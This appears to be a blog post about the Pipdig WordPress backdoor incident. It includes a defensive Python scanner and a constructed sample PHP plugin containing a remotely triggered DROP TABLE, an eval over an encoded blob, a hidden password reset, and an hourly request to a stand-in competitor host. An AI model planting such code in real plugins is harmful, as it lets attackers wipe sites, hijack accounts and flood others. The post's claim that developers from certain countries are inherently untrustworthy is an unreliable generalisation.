Know your WordPress plugin and theme developers!

Yikes! A prominent WordPress theme and plugin company, Pipdig, was caught purposely adding malicious code to their themes and plugins. Many of their themes and plugins have been found to contain a remote kill switch that can destroy an entire web site's database at will. They also include a hidden, purposely obfuscated function that lets Pipdig change users' passwords, plus code that generated hourly requests from the thousands of web sites using their P3 plugin, with the intent of performing a denial-of-service attack on their main competitor's web site. This is about as bad as it gets from a formerly trusted developer.
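The three behaviours described above (a remotely triggered destructive database call, an obfuscated password reset, and a scheduled job that fires outbound requests every hour) all leave recognisable traces in PHP source. The scanner below is an added example written for this post; it is not Pipdig's code and the indicator patterns are generic review heuristics I chose, not signatures taken from the affected plugins. The sample plugin file it scans is constructed here purely to exercise the patterns. A hit is a reason to read the code by hand, not proof of malice, since legitimate plugins also schedule events and make remote requests.

```python
import re
from dataclasses import dataclass
from pathlib import Path

# Heuristic indicators (assumed by this example, not taken from any real plugin)
# for the behaviours a reviewer of third-party WordPress code would want to see.
INDICATORS = {
    # destructive SQL that could wipe the site's database
    "destructive_sql": re.compile(r"\b(DROP|TRUNCATE)\s+(TABLE|DATABASE)\b", re.I),
    # direct password changes for existing users
    "password_change": re.compile(r"\bwp_set_password\s*\("),
    # classic obfuscation wrapper: eval() over a decoded blob
    "obfuscation": re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    # a WP-Cron job registered with an hourly recurrence
    "recurring_schedule": re.compile(r"\bwp_schedule_event\s*\([^;]*['\"]hourly['\"]"),
    # outbound HTTP from the site
    "outbound_request": re.compile(r"\b(wp_remote_get|wp_remote_post|curl_exec|file_get_contents)\s*\("),
    # behaviour keyed off an unauthenticated request parameter (remote trigger)
    "remote_trigger": re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*['\"][^'\"]+['\"]\s*\]"),
}


@dataclass
class Finding:
    path: str
    line: int
    indicator: str
    text: str


def scan_source(path, source):
    """Return one Finding per (line, indicator) hit in a PHP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(path, lineno, name, line.strip()))
    return findings


def classify(findings):
    """Combine single-line hits into the higher-level behaviours the post describes."""
    names = {f.indicator for f in findings}
    behaviours = set()
    if "destructive_sql" in names and "remote_trigger" in names:
        behaviours.add("remote kill switch")
    if "password_change" in names and ("obfuscation" in names or "remote_trigger" in names):
        behaviours.add("hidden password reset")
    if "recurring_schedule" in names and "outbound_request" in names:
        behaviours.add("recurring outbound traffic")
    return behaviours


def scan_tree(root):
    """Scan every PHP file under a wp-content/plugins or wp-content/themes directory."""
    findings = []
    for p in Path(root).rglob("*.php"):
        findings.extend(scan_source(str(p), p.read_text(errors="replace")))
    return findings


# Constructed sample plugin file that exhibits all three patterns; not real plugin code.
SAMPLE_PLUGIN = r'''<?php
add_action('init', function () {
    if (isset($_GET['pd_cmd']) && $_GET['pd_cmd'] === 'reset') {
        global $wpdb;
        $wpdb->query("DROP TABLE {$wpdb->posts}");   // destructive, remotely triggered
    }
});
function p3_maint() {
    eval(base64_decode($GLOBALS['p3_blob']));         // obfuscated payload
    wp_set_password('changed', 1);
}
if (!wp_next_scheduled('p3_ping')) {
    wp_schedule_event(time(), 'hourly', 'p3_ping');
}
add_action('p3_ping', function () { wp_remote_get('https://competitor.example/'); });
'''

# Constructed benign file: enqueues a stylesheet and nothing else.
CLEAN_PLUGIN = r'''<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
'''

if __name__ == "__main__":
    for name, src in (("sample.php", SAMPLE_PLUGIN), ("clean.php", CLEAN_PLUGIN)):
        hits = scan_source(name, src)
        print(f"{name}: {len(hits)} indicator hits, behaviours={sorted(classify(hits))}")
        for h in hits:
            print(f"  {h.path}:{h.line} [{h.indicator}] {h.text}")
```

Point `scan_tree()` at a site's wp-content directory to review every installed plugin and theme in one pass; `classify()` is deliberately conservative and only reports a behaviour when two independent indicators co-occur, which keeps a plugin that merely schedules an hourly cache refresh from being flagged on its own.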

This was discovered by an independent security researcher, who reported it to Wordfence, and Wordfence published the details. On top of all of this, once it was made public, Pipdig went into their plugin code to hide their tracks and later denied everything they had done, in spite of concrete proof to the contrary.

This news should remind all of us that WordPress plugin and theme developers have a lot of control over the security of our web sites. Many of them reside in known hacking hotbed countries, like Ukraine, Russia, and China, so we must always choose our software from the most trusted sources. I, for one, will never download anything from these miscreants again.

This is the official press release from Wordfence regarding this abuse:

Wordfence recommends removing all Pipdig content from your sites, both WordPress and Blogger. Pipdig has demonstrated a willingness to abuse users’ resources to execute unethical, and potentially illegal, activity. Furthermore, their repeated denial of solid evidence, and subsequent attempts to conceal it, leave us unable to trust them in the future.

